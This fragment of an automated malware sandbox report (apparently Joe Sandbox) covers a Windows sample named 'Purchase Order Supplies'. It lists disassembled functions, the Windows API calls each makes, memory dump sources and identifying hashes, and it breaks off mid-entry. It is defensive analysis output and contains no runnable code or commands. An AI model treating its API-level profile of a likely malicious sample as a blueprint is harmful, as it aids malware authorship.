                          • Opcode Fuzzy Hash: bc4778eb6061164b985fba049067c05b1ebf31f0cac3beaf198bda0eeab94274
                          • Instruction Fuzzy Hash: 33313071D00119AFCB00EFB9D8859EFBBFDEF55314B11806AE515E3211DA349E05DBA0
                          Function 00CE497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE49B7
                            • Part of subcall function 00CE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE4A60
                            • Part of subcall function 00CE4A41: InternetCloseHandle.WININET(00000000), ref: 00CE4AFD
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Internet$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 1463438336-0
                          • Opcode ID: 04bb91efd37aa64b6dab76ff5986c4db1bc88ec3ec5b3068af5b3fa9da4d63e9
                          • Instruction ID: 334e87677fd1da8351686b0960538f54b2c8dd464d998f56af92d81725fb8cd3
                          • Opcode Fuzzy Hash: 04bb91efd37aa64b6dab76ff5986c4db1bc88ec3ec5b3068af5b3fa9da4d63e9
                          • Instruction Fuzzy Hash: 8021D431240745BFDB1A9F628C00FBBB7AEFB48711F10402AFA1696651EB719911B7A4
                          Function 00CF8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00CF88A3
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF88BD
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CF88CB
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CF88D9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 437c704dbc161e1955e97132adfbe22c9180f22b28fc017986a4df21ca1440da
                          • Instruction ID: ac97878665e212ca342eec534c1d5fc21ce6fda7e33e46b81e0a2a1bc42e2dfe
                          • Opcode Fuzzy Hash: 437c704dbc161e1955e97132adfbe22c9180f22b28fc017986a4df21ca1440da
                          • Instruction Fuzzy Hash: 3211AF32344115BFDB04AB28CC05FBA77AAAF85360F048119F916C72E1CB74AC0597A5
                          Function 00CE900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                          Download Yara Rule
                          APIs
                          • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00CE906D
                          • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00CE907F
                          • accept.WS2_32(00000000,00000000,00000000), ref: 00CE908C
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE90A3
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLastacceptselect
                          • String ID:
                          • API String ID: 385091864-0
                          • Opcode ID: d1180d49b3f552adb365615b22160ae8da34291ad9463efa968d1a6d255e280f
                          • Instruction ID: 30bfb57ae898a76e2784e388a62f0ec806d84f23f448883289e77498c2e8ecb5
                          • Opcode Fuzzy Hash: d1180d49b3f552adb365615b22160ae8da34291ad9463efa968d1a6d255e280f
                          • Instruction Fuzzy Hash: 292157719001246FC710DF69D885ADABBFCEF49710F00816AF84AD7390DB74DA41CBA0
                          Function 00CD18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CD18FD,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?), ref: 00CD2CB9
                            • Part of subcall function 00CD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00CD18FD,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD2CDF
                            • Part of subcall function 00CD2CAA: lstrcmpiW.KERNEL32(00000000,?,00CD18FD,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?), ref: 00CD2D10
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD1916
                          • lstrcpyW.KERNEL32(00000000,?,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD193C
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00CD1970
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: b28c697c96bda7507696c35f484dbc848c9b0faf4c21ebcb75b8ce0dc2030456
                          • Instruction ID: 5c7d53f9e735544e776a5dd6972b9543ee529ea57c9c8eef4fa5fbe24c91eabd
                          • Opcode Fuzzy Hash: b28c697c96bda7507696c35f484dbc848c9b0faf4c21ebcb75b8ce0dc2030456
                          • Instruction Fuzzy Hash: 6611D036100301BFDB15AF74C865DBA77B9FF84350B44902BF906CB360EB31994197A1
                          Function 00CD713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CD715C
                          • _memset.LIBCMT ref: 00CD717D
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00CD71CF
                          • CloseHandle.KERNEL32(00000000), ref: 00CD71D8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: 706364e45f4be52b9a2480d9ba50875ab819a1f17ba73944b1327d727bd35644
                          • Instruction ID: 39c74c776226e3edac54f597d9d4b9e96a979dc40d6034b86171221d064606c4
                          • Opcode Fuzzy Hash: 706364e45f4be52b9a2480d9ba50875ab819a1f17ba73944b1327d727bd35644
                          • Instruction Fuzzy Hash: 461194719013287AE7206B65AC4DFEFBA7CEF45760F10429AB518E7290D7744E808AA4
                          Function 00CD13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00CD13EE
                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00CD1409
                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00CD141F
                          • FreeLibrary.KERNEL32(?), ref: 00CD1474
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                          • String ID:
                          • API String ID: 3137044355-0
                          • Opcode ID: 96c5180435c94908da958242319aa2d5d39a584641806876ee4a0ceee12ef376
                          • Instruction ID: 96796ce33bbc80a73b5c8801c0ab6bd5f101f3f02273e50e5bab6d38adc46917
                          • Opcode Fuzzy Hash: 96c5180435c94908da958242319aa2d5d39a584641806876ee4a0ceee12ef376
                          • Instruction Fuzzy Hash: E9217271540309BBDB209F91DD88ADABBB8EF00744F04846BEA2297250DB74EA45DF61
                          Function 00CCC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CCC285
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCC297
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCC2AD
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CCC2C8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 047c91a5750f5307b3bc94cfe8c42e9676447e3d52055f0d027d0492b79cabd0
                          • Instruction ID: 364be0db90182f94a30ded6f4c0feab04ce5a7b5ba976bb7deb2c6377a76f834
                          • Opcode Fuzzy Hash: 047c91a5750f5307b3bc94cfe8c42e9676447e3d52055f0d027d0492b79cabd0
                          • Instruction Fuzzy Hash: F511187A940218FFDB11DBD9C885F9DBBB4FB08710F204095EA05B7294D671AE10DB94
                          Function 00CAC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00CAC657
                          • GetStockObject.GDI32(00000011), ref: 00CAC66B
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAC675
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: f040aba1d2a3a0402c89a3e91c3738ba016ac08280514da5e38116ac28290e29
                          • Instruction ID: 9799b5183c1a9ce732569baedc50bdc8c1ca17d9d1c95ba8a1ae3cc5e61d542e
                          • Opcode Fuzzy Hash: f040aba1d2a3a0402c89a3e91c3738ba016ac08280514da5e38116ac28290e29
                          • Instruction Fuzzy Hash: 6011C472501649BFDF128FA0CC84EEA7B69FF0A358F054111FA1492150CB31DC60DBA0
                          Function 00CD49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                          Download Yara Rule
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD49EE
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD4A13
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD4A1D
                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00CD354D,?,00CD45D5,?,00008000), ref: 00CD4A50
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: adf3eadc9062cbbd9691287302656e1717c3f2eec68cdf532c7db285755164bb
                          • Instruction ID: 3a706125b5ac9db0e6ac08211f60b4fd18bfb349377f37151eb7ffa436cc7f8f
                          • Opcode Fuzzy Hash: adf3eadc9062cbbd9691287302656e1717c3f2eec68cdf532c7db285755164bb
                          • Instruction Fuzzy Hash: E6117031D40618EBCF04EFA5D948AEEBB74FF09711F004056EB49B2340CB309591D7A9
                          Function 00CB80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB869D: __getptd_noexit.LIBCMT ref: 00CB869E
                          • __lock.LIBCMT ref: 00CB811F
                          • InterlockedDecrement.KERNEL32(?), ref: 00CB813C
                          • _free.LIBCMT ref: 00CB814F
                          • InterlockedIncrement.KERNEL32(01363B40), ref: 00CB8167
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                          • String ID:
                          • API String ID: 2704283638-0
                          • Opcode ID: 2b3a594ad9b1e98e323ffc7787f426910926907bb06bf2bd49c5b4874737ca14
                          • Instruction ID: ddfb321a61fbd1ef0c2f6407acd85bbf0dfb94d683d78ad9b1b9362113d56276
                          • Opcode Fuzzy Hash: 2b3a594ad9b1e98e323ffc7787f426910926907bb06bf2bd49c5b4874737ca14
                          • Instruction Fuzzy Hash: 4F019235942721ABDB12AF6D980A7DD7368BF05710F044119F824A73D1DF349E46EBE2
                          Function 00CB8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __lock.LIBCMT ref: 00CB8768
                            • Part of subcall function 00CB8984: __mtinitlocknum.LIBCMT ref: 00CB8996
                            • Part of subcall function 00CB8984: RtlEnterCriticalSection.NTDLL(00CB0127), ref: 00CB89AF
                          • InterlockedIncrement.KERNEL32(DC840F00), ref: 00CB8775
                          • __lock.LIBCMT ref: 00CB8789
                          • ___addlocaleref.LIBCMT ref: 00CB87A7
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                          • String ID:
                          • API String ID: 1687444384-0
                          • Opcode ID: c0651d9fdc100a9af6264aa248c56a9c52ce6a600dc3888927e55c2c7246906a
                          • Instruction ID: 4791d12fe16d8964dcb87e894df6b53464c1395199aae3b71fb9470ef71682ba
                          • Opcode Fuzzy Hash: c0651d9fdc100a9af6264aa248c56a9c52ce6a600dc3888927e55c2c7246906a
                          • Instruction Fuzzy Hash: 6C016D71440B00AFD760EF65D805799F7F4EF40325F20890EE4AA973A0CF70A644DB11
                          Function 00CFE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CFE14D
                          • _memset.LIBCMT ref: 00CFE15C
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D53EE0,00D53F24), ref: 00CFE18B
                          • CloseHandle.KERNEL32 ref: 00CFE19D
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 84903028e97db8c75865264ec62bfbb3f7162169aa13416aab048ba6cb89ab27
                          • Instruction ID: ee82e7a3d3acbc10bdcfe8e3bdaa51287e66494d33a575c843e7c8b785ed2444
                          • Opcode Fuzzy Hash: 84903028e97db8c75865264ec62bfbb3f7162169aa13416aab048ba6cb89ab27
                          • Instruction Fuzzy Hash: 22F05EF1940314BFF6105B65AC16FB77AADDF097D6F044420BE04D52A2D7B68E1097B8
                          Function 00CFE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00CAB5EB
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB5FA
                            • Part of subcall function 00CAB58B: BeginPath.GDI32(?), ref: 00CAB611
                            • Part of subcall function 00CAB58B: SelectObject.GDI32(?,00000000), ref: 00CAB63B
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CFE860
                          • LineTo.GDI32(00000000,?,?), ref: 00CFE86D
                          • EndPath.GDI32(00000000), ref: 00CFE87D
                          • StrokePath.GDI32(00000000), ref: 00CFE88B
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: 105a610d0dc8715e4a6db21392cc1cd85d7b2e6097dd5f3d6e51e9b29cd957a9
                          • Instruction ID: 4e87cf85d13cddc9e26424d15f66380c51f9e8d8b738f0960b53c195c6dde1dc
                          • Opcode Fuzzy Hash: 105a610d0dc8715e4a6db21392cc1cd85d7b2e6097dd5f3d6e51e9b29cd957a9
                          • Instruction Fuzzy Hash: 57F05E35001359BBDB126F54AC0DFCE3F9AAF0A315F048101FE11A52E1CB795652DFA5
                          Function 00CCD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CCD640
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCD653
                          • GetCurrentThreadId.KERNEL32 ref: 00CCD65A
                          • AttachThreadInput.USER32(00000000), ref: 00CCD661
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: d3ad42eb0c6c4a32c28f59890edb9924bdc43061d68bdb3707e6cf00ad3b3e00
                          • Instruction ID: e324a0f0ce485e7ea7d19db7218361c47c808aad325ef1b1ab3095bddc41dcaa
                          • Opcode Fuzzy Hash: d3ad42eb0c6c4a32c28f59890edb9924bdc43061d68bdb3707e6cf00ad3b3e00
                          • Instruction Fuzzy Hash: 0BE01531101328BADB205BA2DC0DFDB7F5DEB117A2F008024F90DC5461CB759581CBB0
                          Function 00CAB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 00CAB0C5
                          • SetTextColor.GDI32(?,000000FF), ref: 00CAB0CF
                          • SetBkMode.GDI32(?,00000001), ref: 00CAB0E4
                          • GetStockObject.GDI32(00000005), ref: 00CAB0EC
                          • GetWindowDC.USER32(?,00000000), ref: 00D0ECFA
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D0ED07
                          • GetPixel.GDI32(00000000,?,00000000), ref: 00D0ED20
                          • GetPixel.GDI32(00000000,00000000,?), ref: 00D0ED39
                          • GetPixel.GDI32(00000000,?,?), ref: 00D0ED59
                          • ReleaseDC.USER32(?,00000000), ref: 00D0ED64
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
